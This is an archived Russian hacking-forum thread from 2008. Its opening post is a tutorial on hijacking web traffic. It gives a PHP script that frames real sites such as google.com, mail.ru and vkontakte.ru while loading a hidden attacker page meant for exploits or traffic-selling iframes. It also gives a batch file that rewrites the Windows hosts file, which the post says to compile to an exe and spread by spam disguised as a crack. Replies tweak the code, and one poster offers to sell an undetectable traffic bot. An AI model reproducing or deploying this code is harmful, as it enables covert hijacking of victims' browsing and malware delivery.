PDA

Просмотр полной версии : Сливаем траф через hosts

-=KeepeR=-
25.08.2008, 11:08
Сливаем траф через hosts
В данном топике я вам покажу еще один способ получить постоянный трафик.
Для реализации нам потребуеться хостинг с выделенным ip, либо дед с поднятым на нём денвером.
Обьясню попорядку. После заражения, когда жертва в очередной раз будет прописывать google.com она будет пободать не google.com, а наш сервер, но самое главное что она даже небудет об этом подозревать, так как будет открываться содержимое google.com, но помимо этого в фрейме будет выполняться наш скрипт!
Для чего это нужно вообще? Люди ежедневно посещают такие порталы как google.com mail.ru vkontakte.ru, итп; мы же будем извлекать из этого свою выгоду!
-----------------------------------------------------------

Для примера я буду использовать ip - 127.0.0.1, вы будете ставить вместо него ip своего сервака!
Итак первое на чем мы остановимся это PHP скрипт(index.php) каторый будет выполнять всю основную работу(редирект и отображение нашего скрипта в фрейме).
<?
if ($_SERVER['HTTP_HOST'] == "mail.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://194.67.57.26'>
</frameset>
");
}


if ($_SERVER['HTTP_HOST'] == "rambler.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://81.19.70.3'>
</frameset>
");
}


if ($_SERVER['HTTP_HOST'] == "www.mail.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://194.67.57.26'>
</frameset>
");
}


if ($_SERVER['HTTP_HOST'] == "www.combats.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://80.239.177.34'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "combats.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://80.239.177.34'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "yandex.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://www.yandex.ru'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "ya.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://www.ya.ru'>
</frameset>
");
}


if ($_SERVER['HTTP_HOST'] == "www.google.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://209.85.135.99'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "google.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://209.85.135.99'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "www.microsoft.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://207.46.19.190'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "microsoft.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://207.46.19.190'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "www.gmail.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://72.14.253.83'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "gmail.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://72.14.253.83'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "www.vkontakte.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://195.190.105.240'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "vkontakte.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://195.190.105.240'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "www.odnoklasniki.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://81.177.141.207'>
</frameset>
");
}

if ($_SERVER['HTTP_HOST'] == "odnoklasniki.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://81.177.141.207'>
</frameset>
");
}
?>
Где nash_script.php - страничка каторая будет открываться в невидимом фрейме, в нее Вы можете записать свой эксплоит или вставить ссылкус какойто партнерки, либо поставить ифрейм своей TDS, вобсчем это ваш трафф!
-----------------------------------------------------------

Теперь перейдем непосредсвенно к тому какже заставить компьютер обращаться к нашему серверу, для этого мы будем использовать .bat файл, каторый будет записовать в С:\Windows\system32\drivers\etc\hosts нужные нам строки.
Итак создаем bat файл с таким содержимым:

@echo off
echo 127.0.0.1 mail.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.mail.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 rambler.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.combats.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 combats.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 yandex.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 ya.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 gamil.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.gmail.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.vkontakte.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 vkontakte.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.odnoklasniki.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 odnoklasniki.ru >> C:\windows\system32\drivers\etc\hosts

Теперь идем в гугл и качаем прогу bat2exe и компилим наш батник в ексешку!
Все теперь распотраняем наш файл всеми известными способами, например спамом под видом крякере интерета.... Вобсчем это неважно. Главно что после того как люди запустят наш файл у себя на компе у нас появиться постоянный трафик каторым мы сможем свободно распоряжаться!

Зы. Особо не пинайте, так как тема топика давольно боянистая, но всеже такого я нечитал негде......
o_OBallers
25.08.2008, 12:40
Хорош.
127.0.0.1 это мой ip.
Не надо мне ничего слать.
Мне только недавно Винду установили.
За ваши дурацкие опыты, устал деньги насаживать за переустановку.
Chaak
25.08.2008, 13:04
лучше заменить
if ($_SERVER['HTTP_HOST'] == "combats.ru")
на if(strstr($_SERVER['HTTP_HOST'], 'combats.ru')) // и т.д
_Pantera_
25.08.2008, 13:48
много трафика с этого способа не получишь, если я правильно суть понял....
Бобек
25.08.2008, 13:50
аналогично распространению пинча.
o_OBallers
25.08.2008, 16:47
Автор статьи по всей видимости, не знаком с десктопным программированием.

В связи с этим я хочу сделать предложение автору, и всем заинтересованным лицам.
Я напишу бота который не будет определятся ничем.
Который будет лить трафик каждый раз, когда компьютер подключён к сети, а не когда пользователь лезет на яндекс.
Количество ссылок чтобы лить трафик неограниченно.

Всё просто вам надо создать файл типа:

www.site.org/tds.php
www.site1.org/tds.php
www.site2.org/tds.php
www.site3.org/tds.php
www.site4.org/tds.php

Закачать его на свой сайт, и боты будут автоматически и незаметно посещать эти сайты.

С вас сайт на платном хостинге для управления ботами, причём если вы знаете php давать мне доступ к ftp не надо, вам надо будет написать маленький скрипт для управления ботами, если вы не знаете то придётся предоставить мне доступ чтоб я мог загружать файл со списком сайтов.

Загрузки будем делать вместе.
Если вы не хотите со мной сотрудничать, то вы можете купить бота за очень очень скромную сумму.
Те кто заинтересован пишите в личные сообщения.